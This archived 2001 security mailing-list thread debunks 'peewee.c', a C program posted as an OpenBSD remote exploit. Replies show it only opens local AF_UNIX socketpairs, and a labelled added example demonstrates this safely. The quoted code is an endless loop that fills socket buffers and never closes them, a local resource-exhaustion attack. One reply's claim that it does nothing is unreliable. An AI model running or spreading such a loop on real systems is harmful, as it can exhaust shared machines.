Vulnerability Development mailing list archives
Re: proof of exploited code
From: Brad Doctor <bdoctor () ps-ax com>
Date: Wed, 06 Jun 2001 21:16:34 -0600
Unless this is part of something larger, its current form is entirely bogus. _UNIX is a UNIX domain socket. There is no "remote" exploit here. I think the individual is upset about something. Nothing like publicly making an .. well, you know. "man socket" and search for AF_UNIX if you are curious.
-brad

At 02:03 PM 6/6/2001 -0400, max wrote:
The code doesn't do anything. I ran it on an obsd 2.8 machine and the state of the machine after execution was same as before. From what I understand from this code, it simply opens up 2 local (PF_UNIX) sockets, and writes some garbage to both of them. Socket option calls change receive and send buffers on the socket, which I guess has something to do with the size of the garbage we send to the local sockets. fcntl call sets non block flag on the sockets (I'm not sure I understand what this is, and the man pages are rather concise on this, but I guess it makes it a non-block device?), and then two write calls, where the crap gets written into sockets.

Now, I am by no means an expert or even an experienced programmer, and this analysis is my attempt to understand unix programming better, so please, all flames are welcome. I'm posting this just to see if my assumptions are correct, not to actually give a guru-level analysis. (so if this isn't posted, I'll live)

thanks for letting me waste everyone's time : )

max

> > Fsck Theo Dumbraadt wrote:
> > > > This code shows a remote exploit for opensbsd versions 2.8 and 2.9
> > > > and can now be released to the public to break theo's 4 years without
> > > > remote exploits sayings. I wrote it while people told me it could not
> > > > happen on the list so here is your proofs bitch.
> > > > //
> > > > // peewee.c
> > > > // peewee herman prove of consept this code will show all of the
> > > > // world how vulnirable OpenBSD is and how Theo Dumbraadt is
> > > > // not more than a liar copyraadt 2001 by Jigglypuff
> > > > // http://home.online.no/~wiighome/ninasiden/Jigglypuff.jpg
> > > > // this proggie is GPL licensed to those who use it keep my
> > > > // credits and not be a lamer
> > > > //
> > > > #include <unistd.h>
> > > > #include <sys/socket.h>
> > > > #include <fcntl.h>
> > > > #define BUFFERSIZE 409600
> > > > extern int
> > > > main(void)
> > > > {
> > > >     int p[2], i;
> > > >     char crap[BUFFERSIZE];
> > > >     while (1)
> > > >     {
> > > >         if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
> > > >             break;
> > > >         i = BUFFERSIZE;
> > > >         setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
> > > >         setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
> > > >         setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
> > > >         setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
> > > >         fcntl(p[0], F_SETFL, O_NONBLOCK);
> > > >         fcntl(p[1], F_SETFL, O_NONBLOCK);
> > > >         write(p[0], crap, BUFFERSIZE);
> > > >         write(p[1], crap, BUFFERSIZE);
> > > >     }
> > > >     return(0);
> > > > }
> > > > * Get your free email at http://www.inbox.net
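Added example, not part of the thread or of the posted code: a single-pair probe in C for the two points discussed above, that a socketpair() endpoint is AF_UNIX and therefore local to the machine, and that O_NONBLOCK makes a write to a full socket buffer fail with EAGAIN instead of sleeping. The struct and function names are this example's own.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Constructed for this example; not from the thread. */
struct fill_result {
    int  family;      /* address family the kernel reports for p[0] */
    long queued;      /* bytes accepted before the kernel refused more */
    int  last_errno;  /* errno of the refused write */
};

/* Fill one non-blocking socketpair whose peer never reads, then clean up. */
int probe_socketpair(struct fill_result *r)
{
    int p[2];
    char buf[4096];
    struct sockaddr_storage ss;
    socklen_t len = sizeof(ss);
    ssize_t n;

    memset(buf, 0, sizeof(buf));
    memset(&ss, 0, sizeof(ss));
    memset(r, 0, sizeof(*r));
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
        return -1;
    if (getsockname(p[0], (struct sockaddr *)&ss, &len) == 0)
        r->family = ss.ss_family;          /* AF_UNIX: no network address */
    fcntl(p[0], F_SETFL, fcntl(p[0], F_GETFL) | O_NONBLOCK);
    /* A blocking write would sleep here once the buffer is full; with
       O_NONBLOCK it returns -1 and sets errno instead. */
    while ((n = write(p[0], buf, sizeof(buf))) > 0)
        r->queued += n;
    r->last_errno = (n == -1) ? errno : 0;
    close(p[0]);   /* closing both ends frees the queued data and the */
    close(p[1]);   /* descriptors; the quoted loop never does this    */
    return 0;
}

int main(void)
{
    struct fill_result r;
    if (probe_socketpair(&r) != 0)
        return 1;
    printf("family=%d queued=%ld errno=%s\n", r.family, r.queued, strerror(r.last_errno));
    return 0;
}
```

The number of bytes queued depends on the system's socket buffer limits, so it differs between machines.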